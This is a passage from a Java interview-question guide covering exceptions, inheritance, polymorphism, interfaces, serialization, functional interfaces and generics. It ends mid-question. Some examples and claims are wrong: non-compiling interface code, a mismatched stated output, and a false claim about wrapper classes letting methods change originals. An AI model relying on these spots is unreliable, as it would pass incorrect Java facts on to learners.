```java /** * Exception Propagation */ class TestExceptionPropagation { void method1() { int data = 10 / 0; // generates an exception System.out.println(data); } void method2() { method1(); // doesn't catch the exception } void method3() { // method3 catches the exception try { method2(); } catch (Exception e) { System.out.println("Exception is caught"); } } public static void main(String args[]) { TestExceptionPropagation obj = new TestExceptionPropagation(); obj.method3(); } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are different scenarios causing "Exception in thread main"? Some of the common main thread exception are as follows: * **Exception in thread main java.lang.UnsupportedClassVersionError**: This exception comes when your java class is compiled from another JDK version and you are trying to run it from another java version. * **Exception in thread main java.lang.NoClassDefFoundError**: There are two variants of this exception. The first one is where you provide the class full name with .class extension. The second scenario is when Class is not found. * **Exception in thread main java.lang.NoSuchMethodError: main**: This exception comes when you are trying to run a class that doesn\'t have main method. * **Exception in thread "main" java.lang.ArithmeticException**: Whenever any exception is thrown from main method, it prints the exception is console. The first part explains that exception is thrown from main method, second part prints the exception class name and then after a colon, it prints the exception message. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are the differences between throw and throws? **Throw** keyword is used in the method body to throw an exception, while **throws** is used in method signature to declare the exceptions that can occur in the statements present in the method. **Example:** ```java /** * Throw in Java */ public class ThrowExample { void checkAge(int age) { if (age < 18) throw new ArithmeticException("Not Eligible for voting"); else System.out.println("Eligible for voting"); } public static void main(String args[]) { ThrowExample obj = new ThrowExample(); obj.checkAge(13); System.out.println("End Of Program"); } } ``` Output ```java Exception in thread "main" java.lang.ArithmeticException: Not Eligible for voting at Example1.checkAge(Example1.java:4) at Example1.main(Example1.java:10) ``` **Example:** ```java /** * Throws in Java */ public class ThrowsExample { int division(int a, int b) throws ArithmeticException { int t = a / b; return t; } public static void main(String args[]) { ThrowsExample obj = new ThrowsExample(); try { System.out.println(obj.division(15, 0)); } catch (ArithmeticException e) { System.out.println("You shouldn't divide number by zero"); } } } ``` Output ```java You shouldn\'t divide number by zero ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. While overriding a method can you throw another exception or broader exception? If a method declares to throw a given exception, the overriding method in a subclass can only declare to throw that exception or its subclass. This is because of polymorphism. **Example:** ```java class A { public void message() throws IOException {..} } class B extends A { @Override public void message() throws SocketException {..} // allowed @Override public void message() throws SQLException {..} // NOT allowed public static void main(String args[]) { A a = new B(); try { a.message(); } catch (IOException ex) { // forced to catch this by the compiler } } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is checked, unchecked exception and errors? **1. Checked Exception**: * These are the classes that extend **Throwable** except **RuntimeException** and **Error**. * They are also known as compile time exceptions because they are checked at **compile time**, meaning the compiler forces us to either handle them with try/catch or indicate in the function signature that it **throws** them and forcing us to deal with them in the caller. * They are programmatically recoverable problems which are caused by unexpected conditions outside the control of the code (e.g. database down, file I/O error, wrong input, etc). **Example:** **IOException, SQLException** etc. ```java import java.io.*; class Main { public static void main(String[] args) { FileReader file = new FileReader("C:\\assets\\file.txt"); BufferedReader fileInput = new BufferedReader(file); for (int counter = 0; counter < 3; counter++) System.out.println(fileInput.readLine()); fileInput.close(); } } ``` output: ```java Exception in thread "main" java.lang.RuntimeException: Uncompilable source code - unreported exception java.io.FileNotFoundException; must be caught or declared to be thrown at Main.main(Main.java:5) ``` After adding IOException ```java import java.io.*; class Main { public static void main(String[] args) throws IOException { FileReader file = new FileReader("C:\\assets\\file.txt"); BufferedReader fileInput = new BufferedReader(file); for (int counter = 0; counter < 3; counter++) System.out.println(fileInput.readLine()); fileInput.close(); } } ``` output: ```java Output: First three lines of file “C:\assets\file.txt” ``` **2. Unchecked Exception**: * The classes that extend **RuntimeException** are known as unchecked exceptions. * Unchecked exceptions are not checked at compile-time, but rather at **runtime**, hence the name. * They are also programmatically recoverable problems but unlike checked exception they are caused by faults in code flow or configuration. **Example:** **ArithmeticException, NullPointerException, ArrayIndexOutOfBoundsException** etc. ```java class Main { public static void main(String args[]) { int x = 0; int y = 10; int z = y/x; } } ``` Output: ```java Exception in thread "main" java.lang.ArithmeticException: / by zero at Main.main(Main.java:5) Java Result: 1 ``` **3. Error**: **Error** refers to an irrecoverable situation that is not being handled by a **try/catch**. Example: **OutOfMemoryError, VirtualMachineError, AssertionError** etc. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is difference between ClassNotFoundException and NoClassDefFoundError? `ClassNotFoundException` and `NoClassDefFoundError` occur when a particular class is not found at runtime. However, they occur at different scenarios. `ClassNotFoundException` is an exception that occurs when you try to load a class at run time using `Class.forName()` or `loadClass()` methods and mentioned classes are not found in the classpath. `NoClassDefFoundError` is an error that occurs when a particular class is present at compile time, but was missing at run time. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 16. JAVA INHERITANCE <br/> ## Q. What is the difference between aggregation and composition? **1. Aggregation:** We call aggregation those relationships whose **objects have an independent lifecycle, but there is ownership**, and child objects cannot belong to another parent object. **Example:** Since Organization has Person as employees, the relationship between them is Aggregation. Here is how they look like in terms of Java classes ```java /** * Aggregation */ public class Organization { private List employees; } public class Person { private String name; } ``` **2. Composition:** We use the term composition to refer to relationships whose objects **don\'t have an independent lifecycle**, and if the parent object is deleted, all child objects will also be deleted. **Example:** Since Engine is-part-of Car, the relationship between them is Composition. Here is how they are implemented between Java classes. ```java /** * Composition */ public class Car { //final will make sure engine is initialized private final Engine engine; public Car(){ engine = new Engine(); } } class Engine { private String type; } ``` <p align="center"> <img src="assets/aggregation.png" alt="Aggregation" width="400px" /> </p> <table class="alt"> <tbody><tr><th>Aggregation</th><th>Composition</th></tr> <tr><td>Aggregation is a weak Association.</td><td>Composition is a strong Association.</td></tr> <tr><td>Class can exist independently without owner.</td><td>Class can not meaningfully exist without owner.</td></tr> <tr><td>Have their own Life Time.</td><td>Life Time depends on the Owner.</td></tr> <tr><td>A uses B.</td><td>A owns B.</td></tr> <tr><td>Child is not owned by 1 owner.</td><td>Child can have only 1 owner.</td></tr> <tr><td>Has-A relationship. A has B.</td><td>Part-Of relationship. B is part of A.</td></tr> <tr><td>Denoted by a empty diamond in UML.</td><td>Denoted by a filled diamond in UML.</td></tr> <tr><td>We do not use "final" keyword for Aggregation.</td><td>"final" keyword is used to represent Composition.</td></tr> <tr><td>Examples:<br>- Car has a Driver.<br>- A Human uses Clothes.<br>- A Company is an aggregation of People.<br>- A Text Editor uses a File.<br>- Mobile has a SIM Card.</td><td>Examples:<br>- Engine is a part of Car.<br>- A Human owns the Heart.<br>- A Company is a composition of Accounts.<br>- A Text Editor owns a Buffer.<br>- IMEI Number is a part of a Mobile.</td></tr> </tbody></table> *Note: "final" keyword is used in Composition to make sure child variable is initialized.* <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. The difference between Inheritance and Composition? Though both Inheritance and Composition provides code reusablility, main difference between Composition and Inheritance in Java is that Composition allows reuse of code without extending it but for Inheritance you must extend the class for any reuse of code or functionality. Inheritance is an **"is-a"** relationship. Composition is a **"has-a"**. **Example:** Inheritance ```java /** * Inheritance */ class Fruit { // ... } class Apple extends Fruit { // ... } ``` **Example:** Composition ```java /** * Composition */ class Fruit { // ... } class Apple { private Fruit fruit = new Fruit(); // ... } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. Can you declare the main method as final? Yes. We can declare main method as final. But, In inheritance concept we cannot declare main method as final in parent class. It give compile time error. The main method has to be public because it has to be called by JVM which is outside the scope of the package and hence would need the access specifier-public. **Example:** ```java public class Test { public final static void main(String[] args) throws Exception { System.out.println("This is Test Class"); } } class Child extends Test { public static void main(String[] args) throws Exception { System.out.println("This is Child Class"); } } ``` Output ```java Cannot override the final method from Test. ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is covariant return type? It is possible to have different return type for a overriding method in child class, but child\'s return type should be sub-type of parent\'s return type. Overriding method becomes variant with respect to return type. The covariant return type specifies that the return type may vary in the same direction as the subclass. **Example:** ```java /** * Covariant Return Type */ class SuperClass { SuperClass get() { System.out.println("SuperClass"); return this; } } public class Tester extends SuperClass { Tester get() { System.out.println("SubClass"); return this; } public static void main(String[] args) { SuperClass tester = new Tester(); tester.get(); } } ``` Output: ```java Subclass ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. Can you explain Liskov Substitution principle? Liskov Substitution principle (LSP) states that **sub/child/derived-classes should be substitutable for their base/parent-classes.** Given a class B is subclass of class A , we should be able to pass an object of class B to any method that expects(takes as an argument/parameter) an object of class A and the method should not give any weird output in that case. `ClientTestProgram` class has a method `playVideoInAllMediaPlayers()` which accepts list of all `MediaPlayer` objects and plays video for each , but method fails at `WinampMediaPlayer` ? Let's check whether it satisfies **LSP**. ```java public class MediaPlayer { // Play audio implementation public void playAudio() { System.out.println("Playing audio..."); } // Play video implementation public void playVideo() { System.out.println("Playing video..."); } } public class VlcMediaPlayer extends MediaPlayer {} public class WinampMediaPlayer extends MediaPlayer { // Play video is not supported in Winamp player public void playVideo() { throw new VideoUnsupportedException(); } } public class VideoUnsupportedException extends RuntimeException { private static final long serialVersionUID = 1 L; } public class ClientTestProgram { public static void main(String[] args) { // Created list of players List < MediaPlayer > allPlayers = new ArrayList < MediaPlayer > (); allPlayers.add(new VlcMediaPlayer()); allPlayers.add(new DivMediaPlayer()); // Play video in all players playVideoInAllMediaPlayers(allPlayers); // Well - all works as of now...... :-) System.out.println("---------------------------"); // Now adding new Winamp player allPlayers.add(new WinampMediaPlayer()); // Again play video in all players & Oops it broke the program... :-( // Why we got unexpected behavior in client? --- Because LSP is violated in WinampMediaPlayer.java, // as it changed the original behavior of super class MediaPlayer.java playVideoInAllMediaPlayers(allPlayers); } /** * This method is playing video in all players * * @param allPlayers */ public static void playVideoInAllMediaPlayers(List < MediaPlayer > allPlayers) { for (MediaPlayer player: allPlayers) { player.playVideo(); } } } ``` Let\'s refactor the code to make "good" design using **LSP**? - `MediaPlayer` is super class having play audio ability. - `VideoMediaPlayer` extends `MediaPlayer` and adds play video ability. - `DivMediaPlayer` and `VlcMediaPlayer` both extends `VideoMediaPlayer` for playing audio and video ability. - `WinampMediaPlayer` which extends `MediaPlayer` for playing audio ability only. - so client program can substitute `DivMediaPlayer` or `VlcMediaPlayer` for their super class `VideoMediaPlayer` lets reimplement the refactored code ```java public class MediaPlayer { // Play audio implementation public void playAudio() { System.out.println("Playing audio..."); } } //separated video playing ability from base class public class VideoMediaPlayer extends MediaPlayer { // Play video implementation public void playVideo() { System.out.println("Playing video..."); } } public class DivMediaPlayer extends VideoMediaPlayer {} public class VlcMediaPlayer extends VideoMediaPlayer {} //as Winamp expects only audio playing ability, so it must only extend relative base class behaviour, no need to inherit unnecessary behaviour public class WinampMediaPlayer extends MediaPlayer {} /** * This method is playing video in all players * * @param allPlayers */ public static void playVideoInAllMediaPlayers(List <VideoMediaPlayer> allPlayers) { for (VideoMediaPlayer player: allPlayers) { player.playVideo(); } } ``` Now, in `ClientTestProgram` , instead of creating list of type `MediaPlayer`, we will create list of `VideoMediaPlayer` type that should give us compile time error at statement `allPlayers.add(new WinampMediaPlayer()); ` as `WinampMediaPlayer` isnt subclass of `VideoMediaPlayer`.But in case of `DivMediaPlayer` and `VlcMediaPlayer` they are substitutable for their parent class as seen in `playVideoInAllMediaPlayers()` method that satisefies *Liskov's substitution principle*. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 17. JAVA METHOD OVERRIDING <br/> ## # 18. JAVA POLYMORPHISM <br/> ## Q. What is the difference between compile-time polymorphism and runtime polymorphism? There are two types of polymorphism in java: 1. Static Polymorphism also known as Compile time polymorphism 2. Runtime polymorphism also known as Dynamic Polymorphism **1. Static Polymorphism:** Method overloading is one of the way java supports static polymorphism. Here we have two definitions of the same method add() which add method would be called is determined by the parameter list at the compile time. That is the reason this is also known as compile time polymorphism. **Example:** ```java /** * Static Polymorphism */ class SimpleCalculator { int add(int a, int b) { return a + b; } int add(int a, int b, int c) { return a + b + c; } } public class Demo { public static void main(String args[]) { SimpleCalculator obj = new SimpleCalculator(); System.out.println(obj.add(10, 20)); System.out.println(obj.add(10, 20, 30)); } } ``` Output ```java 30 60 ``` **2. Runtime Polymorphism:** It is also known as **Dynamic Method Dispatch**. Dynamic polymorphism is a process in which a call to an overridden method is resolved at runtime, thats why it is called runtime polymorphism. **Example:** ```java /** * Runtime Polymorphism */ class ABC { public void myMethod() { System.out.println("Overridden Method"); } } public class XYZ extends ABC { public void myMethod() { System.out.println("Overriding Method"); } public static void main(String args[]) { ABC obj = new XYZ(); obj.myMethod(); } } ``` Output: ```java Overriding Method ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What do you mean Run time Polymorphism? `Polymorphism` in Java is a concept by which we can perform a single action in different ways. There are two types of polymorphism in java: * **Static Polymorphism** also known as compile time polymorphism * **Dynamic Polymorphism** also known as runtime polymorphism **Example:** Static Polymorphism ```java class SimpleCalculator { int add(int a, int b) { return a + b; } int add(int a, int b, int c) { return a + b + c; } } public class MainClass { public static void main(String args[]) { SimpleCalculator obj = new SimpleCalculator(); System.out.println(obj.add(10, 20)); System.out.println(obj.add(10, 20, 30)); } } ``` Output ```java 30 60 ``` **Example:** Runtime polymorphism ```java class ABC { public void myMethod() { System.out.println("Overridden Method"); } } public class XYZ extends ABC { public void myMethod() { System.out.println("Overriding Method"); } public static void main(String args[]) { ABC obj = new XYZ(); obj.myMethod(); } } ``` Output ```java Overriding Method ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is runtime polymorphism in java? **Runtime polymorphism** or **Dynamic Method Dispatch** is a process in which a call to an overridden method is resolved at runtime rather than compile-time. An overridden method is called through the reference variable of a superclass. The determination of the method to be called is based on the object being referred. ```java class Bank{ public float roi=0.0f; float getRateOfInterest(){return this.roi;} } class SBI extends Bank{ float roi=8.4f; float getRateOfInterest(){return this.roi;} } class ICICI extends Bank{ float roi=7.3f; float getRateOfInterest(){return this.roi;} } class AXIS extends Bank{ float roi=9.7f; float getRateOfInterest(){return this.roi;} } Bank b; b=new SBI(); System.out.println("SBI Rate of Interest: "+b.getRateOfInterest()); b=new ICICI(); System.out.println("ICICI Rate of Interest: "+b.getRateOfInterest()); b=new AXIS(); System.out.println("AXIS Rate of Interest: "+b.getRateOfInterest()); System.out.println("Bank Rate of Interest: "+b.roi); /**output: SBI Rate of Interest: 8.4 ICICI Rate of Interest: 7.3 AXIS Rate of Interest: 9.7 Bank Rate of Interest: 0.0 //you might think it should be 9.7 , as recent object being refered to is of AXIS but method is overridden, not the data members, so runtime polymorphism can't be achieved by data members/instance variables. **/ ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 19. JAVA ABSTRACTION <br/> ## Q. What is the difference between abstract class and interface? Abstract class and interface both are used to achieve abstraction where we can declare the abstract methods. Abstract class and interface both can\'t be instantiated. |Abstract Class |Interface | |-----------------------------|---------------------------------| |Abstract class can have abstract and non-abstract methods.|Interface can have only abstract methods. Since Java 8, it can have default and static methods also.| |Abstract class doesn\'t support multiple inheritance.|Interface supports multiple inheritance.| |Abstract class can have final, non-final, static and non-static variables.|Interface has only static and final variables.| |Abstract class can provide the implementation of interface.|Interface can\'t provide the implementation of abstract class.| |An abstract class can extend another Java class and implement multiple Java interfaces.|An interface can extend another Java interface only.| |An abstract class can be extended using keyword "extends".|An interface can be implemented using keyword "implements".| |A Java abstract class can have class members like private, protected, etc.|Members of a Java interface are public by default.| <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are Wrapper classes? The wrapper class in Java provides the mechanism to convert primitive into object and object into primitive. **Use of Wrapper classes in Java:** * **Change the value in Method**: Java supports only call by value. So, if we pass a primitive value, it will not change the original value. But, if we convert the primitive value in an object, it will change the original value. * **Serialization**: We need to convert the objects into streams to perform the serialization. If we have a primitive value, we can convert it in objects through the wrapper classes. * **Synchronization**: Java synchronization works with objects in Multithreading. * **java.util package**: The java.util package provides the utility classes to deal with objects. * **Collection Framework**: Java collection framework works with objects only. All classes of the collection framework (ArrayList, LinkedList, Vector, HashSet, LinkedHashSet, TreeSet, PriorityQueue, ArrayDeque, etc.) deal with objects only. | Sl.No|Primitive Type | Wrapper class | |------|----------------|----------------------| | 01. |boolean |Boolean| | 02. |char |Character| | 03. |byte |Byte| | 04. |short |Short| | 05. |int |Integer| | 06. |long |Long| | 07. |float |Float| | 08. |double |Double| **Example:** Primitive to Wrapper ```java /** * Java program to convert primitive into objects * Autoboxing example of int to Integer */ class WrapperExample { public static void main(String args[]) { int a = 20; Integer i = Integer.valueOf(a); // converting int into Integer explicitly Integer j = a; // autoboxing, now compiler will write Integer.valueOf(a) internally System.out.println(a + " " + i + " " + j); } } ``` Output ```java 20 20 20 ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is the difference between abstraction and encapsulation? In Java, Abstraction is supported using `interface` and `abstract class` while Encapsulation is supported using access modifiers e.g. public, private and protected. Abstraction solves the problem at design level while Encapsulation solves it implementation level. Abstraction is about hiding unwanted details while giving out most essential details, while Encapsulation means hiding the code and data into a single unit e.g. class or method to protect inner working of an object from outside world. **Difference:** <table class="alt"> <tbody><tr><th>Abstraction</th><th>Encapsulation</th></tr> <tr><td>Abstraction is a process of hiding the implementation details and showing only functionality to the user.</td> <td> Encapsulation is a process of wrapping code and data together into a single unit</td></tr> <tr><td>Abstraction lets you focus on what the object does instead of how it does it.</td> <td>Encapsulation provides you the control over the data and keeping it safe from outside misuse.</td></tr> <tr><td>Abstraction solves the problem in the Design Level.</td> <td>Encapsulation solves the problem in the Implementation Level.</td></tr> <tr><td>Abstraction is implemented by using Interfaces and Abstract Classes.</td> <td>Encapsulation is implemented by using Access Modifiers (private, default, protected, public)</td></tr> <tr><td>Abstraction means hiding implementation complexities by using interfaces and abstract class.</td> <td>Encapsulation means hiding data by using setters and getters.</td></tr> </tbody></table> <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 20. JAVA INTERFACES <br/> ## Q. Can we use private or protected member variables in an interface? The java compiler adds public and abstract keywords before the interface method and **public, static and final keyword** before data members automatically ```java public interface Test { public string name1; private String email; protected pass; } ``` as you have declare variable in test interface with private and protected it will give error. if you do not specify the modifier the compiler will add public static final automatically. ```java public interface Test { public static final string name1; public static final String email; public static final pass; } ``` * Interfaces cannot be instantiated that is why the variable are **static** * Interface are used to achieve the 100% abstraction there for the variable are **final** * An interface provide a way for the client to interact with the object. If variables were not public, the clients would not have access to them. that is why variable are **public** <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. When can an object reference be cast to a Java interface reference? An interface reference can point to any object of a class that implements this interface ```java /** * Interface */ interface MyInterface { void display(); } public class TestInterface implements MyInterface { void display() { System.out.println("Hello World"); } public static void main(String[] args) { MyInterface myInterface = new TestInterface(); MyInterface.display(); } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. How can you avoid serialization in child class if the base class is implementing the Serializable interface? If superClass has implemented Serializable that means subclass is also Serializable ( as subclass always inherits all features from its parent class ), for avoiding Serialization in sub-class we can define **writeObject()** method and throw **NotSerializableException()** from there as done below. ```java /** * Serialization */ import java.io.FileOutputStream; import java.io.IOException; import java.io.NotSerializableException; import java.io.ObjectOutput; import java.io.ObjectOutputStream; import java.io.OutputStream; import java.io.Serializable; class Super implements Serializable { private static final long serialVersionUID = 1L; } class Sub extends Super { private static final long serialVersionUID = 1L; private Integer id; public Sub(Integer id) { this.id = id; } @Override public String toString() { return "Employee [id=" + id + "]"; } /* * define how Serialization process will write objects. */ private void writeObject(ObjectOutputStream os) throws NotSerializableException { throw new NotSerializableException("This class cannot be Serialized"); } } public class SerializeDeserialize { public static void main(String[] args) { Sub object1 = new Sub(8); try { OutputStream fout = new FileOutputStream("ser.txt"); ObjectOutput oout = new ObjectOutputStream(fout); System.out.println("Serialization process has started, serializing objects..."); oout.writeObject(object1); fout.close(); oout.close(); System.out.println("Object Serialization completed."); } catch (IOException e) { e.printStackTrace(); } } } ``` Output ```java Serialization process has started, serializing objects... java.io.NotSerializableException: This class cannot be Serialized at SerDeser11throwNotSerExc.Sub.writeObject(SerializeConstructorCheck.java:35) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source) at java.lang.reflect.Method.invoke(Unknown Source) at java.io.ObjectStreamClass.invokeWriteObject(Unknown Source) at java.io.ObjectOutputStream.writeSerialData(Unknown Source) at java.io.ObjectOutputStream.writeOrdinaryObject(Unknown Source) at java.io.ObjectOutputStream.writeObject0(Unknown Source) at java.io.ObjectOutputStream.writeObject(Unknown Source) at SerDeser11throwNotSerExc.SerializeConstructorCheck.main(SerializeConstructorCheck.java:51) ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is the difference between Serializable and Externalizable interface? |SERIALIZABLE |EXTERNALIZABLE | |----------------|-----------------------| |Serializable is a marker interface i.e. does not contain any method.| Externalizable interface contains two methods writeExternal() and readExternal() which implementing classes MUST override.| |Serializable interface pass the responsibility of serialization to JVM and it\'s default algorithm.| Externalizable provides control of serialization logic to programmer – to write custom logic.| |Mostly, default serialization is easy to implement, but has higher performance cost.|Serialization done using Externalizable, add more responsibility to programmer but often result in better performance.| |It\'s hard to analyze and modify class structure because any change may break the serialization.| It\'s more easy to analyze and modify class structure because of complete control over serialization logic.| |Default serialization does not call any class constructor.|A public no-arg constructor is required while using Externalizable interface. | <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. How to create marker interface? An interface with no methods is known as marker or tagged interface. It provides some useful information to JVM/compiler so that JVM/compiler performs some special operations on it. It is used for better readability of code. For example Serializable, Clonnable etc. **Syntax:** ```java public interface Interface_Name { } ``` **Example:** ```java /** * Maker Interface */ interface Marker { } class MakerExample implements Marker { // do some task } class Main { public static void main(String[] args) { MakerExample obj = new MakerExample(); if (obj instanceOf Marker) { // do some task } } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. Can you declare an interface method static? Java 8 interface changes include static methods and default methods in interfaces. Prior to Java 8, we could have only method declarations in the interfaces. But from Java 8, we can have default methods and static methods in the interfaces. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is a Functional Interface? A **functional interface** is an interface that defines only one abstract method. To accurately determine the interface as functional, an annotation has been added `@FunctionalInterface` that works on the principle of `@Override`. It will designate a plan and will not allow to define the second abstract method in the interface. An interface can include as many `default` methods as you like while remaining functional, because `default` methods are not abstract. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are `default` interface methods? Java 8 allows you to add non-abstract method implementations to an interface using the keyword default: ```java interface Example { int process ( int a ); default void show () { System.out.println("default show ()"); } } ``` * If a class implements an interface, it can, but does not have to, implement the default methods already implemented in the * interface. The class inherits the default implementation. * If a class implements several interfaces that have the same default method, then the class must implement the method with the same signature on its own. The situation is similar if one interface has a default method, and in the other the same method is abstract - no class default implementation is inherited. * The default method cannot override the class method `java.lang.Object`. * They help implement interfaces without fear of disrupting other classes. * Avoid creating utility classes, since all the necessary methods can be represented in the interfaces themselves. * They give classes the freedom to choose the method to be redefined. * One of the main reasons for introducing default methods is the ability of collections in Java 8 to use lambda expressions. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. How to call `default` interface method in a class that implements this interface? Using the keyword superalong with the interface name: ```java interface Paper { default void show () { System.out.println(" default show ()"); } } class License implements Paper { public void show () { Paper.super.show(); } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is `static` interface method? Static interface methods are similar to default methods, except that there is no way to override them in classes that implement the interface. * Static methods in the interface are part of the interface without the ability to use them for objects of the implementation class * Class methods `java.lang.Object`cannot be overridden as static * Static methods in the interface are used to provide helper methods, for example, checking for null, sorting collections, etc. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. How to call `static` interface method? Using the interface name: ```java interface Paper { static void show () { System.out.println( " static show () " ); } } class License { public void showPaper () { Paper.show (); } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are the functional interfaces `Function<T,R>`, `DoubleFunction<R>`, `IntFunction<R>` and `LongFunction<R>`? `Function<T, R>`- the interface with which a function is implemented that receives an instance of the class `T` and returns an instance of the class at the output `R`. Default methods can be used to build call chains ( `compose`, `andThen`). ```java Function < String , Integer > toInteger = Integer :: valueOf; Function < String , String > backToString = toInteger.andThen ( String :: valueOf); backToString.apply("123"); // "123" ``` * `DoubleFunction<R>`- a function that receives input `Double` and returns an instance of the class at the output `R`; * `IntFunction<R>`- a function that receives input `Integer`and returns an instance of the class at the output `R`; * `LongFunction<R>`- a function that receives input `Long`and returns an instance of the class at the output `R`. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are the functional interfaces `UnaryOperator<T>`, `DoubleUnaryOperator`, `IntUnaryOperator`and `LongUnaryOperator`? `UnaryOperator<T>`(**unary operator**) takes an object of type as a parameter `T`, performs operations on them and returns the result of operations in the form of an object of type `T`: ```java UnaryOperator < Integer > operator = x - > x * x; System.out.println(operator.apply ( 5 )); // 25 ``` * `DoubleUnaryOperator`- unary operator receiving input `Double`; * `IntUnaryOperator`- unary operator receiving input `Integer`; * `LongUnaryOperator`- unary operator receiving input `Long`. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are the functional interfaces `BinaryOperator<T>`, `DoubleBinaryOperator`, `IntBinaryOperator`and `LongBinaryOperator`? `BinaryOperator<T>`(**binary operator**) - an interface through which a function is implemented that receives two instances of the class `T`and returns an instance of the class at the output `T`. ```java BinaryOperator < Integer > operator = (a, b) -> a + b; System.out.println(operator.apply ( 1 , 2 )); // 3 ``` * `DoubleBinaryOperator`- binary operator receiving input Double; * `IntBinaryOperator`- binary operator receiving input Integer; * `LongBinaryOperator`- binary operator receiving input Long. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are the functional interfaces `Predicate<T>`, `DoublePredicate`, `IntPredicateand` `LongPredicate`? `Predicate<T>`(**predicate**) - the interface with which a function is implemented that receives an instance of the class as input `T`and returns the type value at the output `boolean`. The interface contains a variety of methods by default, allow to build complex conditions ( `and`, `or`, `negate`). ```java Predicate < String > predicate = (s) -> s.length () > 0 ; predicate.test("foo"); // true predicate.negate().test("foo"); // false ``` * `DoublePredicate`- predicate receiving input `Double`; * `IntPredicate`- predicate receiving input `Integer`; * `LongPredicate`- predicate receiving input `Long`. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are the functional interfaces `Consumer<T>`, `DoubleConsumer`, `IntConsumer`and `LongConsumer`? `Consumer<T>`(**consumer**) - the interface through which a function is implemented that receives an instance of the class as an input `T`, performs some action with it, and returns nothing. ```java Consumer<String> hello = (name) -> System.out.println( " Hello, " + name); hello.accept( " world " ); ``` * `DoubleConsumer`- the consumer receiving the input `Double`; * `IntConsumer`- the consumer receiving the input `Integer`; * `LongConsumer`- the consumer receiving the input `Long`. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are the functional interfaces `Supplier<T>`, `BooleanSupplier`, `DoubleSupplier`, `IntSupplier`and `LongSupplier`? `Supplier<T>`(**provider**) - the interface through which a function is implemented that takes nothing to the input, but returns the result of the class to the output `T`; ```java Supplier < LocalDateTime > now = LocalDateTime::now; now.get(); ``` * `DoubleSupplier`- the supplier is returning `Double`; * `IntSupplier`- the supplier is returning `Integer`; * `LongSupplier`- the supplier is returning `Long`. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> #### Q. What is Spliterator in Java SE 8? #### Q. What is Type Inference in Java 8? #### Q. What is difference between External Iteration and Internal Iteration? *ToDo* <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 21. JAVA ENCAPSULATION <br/> ## Q. How Encapsulation concept implemented in JAVA? Encapsulation in Java is a mechanism of wrapping the data (variables) and code acting on the data (methods) together as a single unit. In encapsulation, the variables of a class will be hidden from other classes, and can be accessed only through the methods of their current class. Therefore, it is also known as `data hiding`. To achieve encapsulation in Java − * Declare the variables of a class as private. * Provide public setter and getter methods to modify and view the variables values. **Example:** ```java public class EncapClass { private String name; public String getName() { return name; } public void setName(String newName) { name = newName; } } public class MainClass { public static void main(String args[]) { EncapClass obj = new EncapClass(); obj.setName("Pradeep Kumar"); System.out.print("Name : " + obj.getName()); } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 22. JAVA GENERICS <br/> ## Q. Do you know Generics? How did you used in your coding? `Generics` allows type (Integer, String, … etc and user defined types) to be a parameter to methods, classes and interfaces. For example, classes like HashSet, ArrayList, HashMap, etc use generics very well. **Advantages:** * **Type-safety**: We can hold only a single type of objects in generics. It doesn\'t allow to store other objects. * **Type Casting**: There is no need to typecast the object. * **Compile-Time Checking**: It is checked at compile time so problem will not occur at runtime. **Example:** ```java /** * A Simple Java program to show multiple * type parameters in Java Generics * * We use < > to specify Parameter type * **/ class GenericClass<T, U> { T obj1; // An object of type T U obj2; // An object of type U // constructor GenericClass(T obj1, U obj2) { this.obj1 = obj1; this.obj2 = obj2; } // To print objects of T and U public void print() { System.out.println(obj1); System.out.println(obj2); } } // Driver class to test above class MainClass { public static void main (String[] args) { GenericClass <String, Integer> obj = new GenericClass<String, Integer>("Generic Class Example !", 100); obj.print(); } } ``` Output: ```java Generic Class Example ! 100 ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 23. MISCELLANEOUS <br/> ## Q. How will you invoke 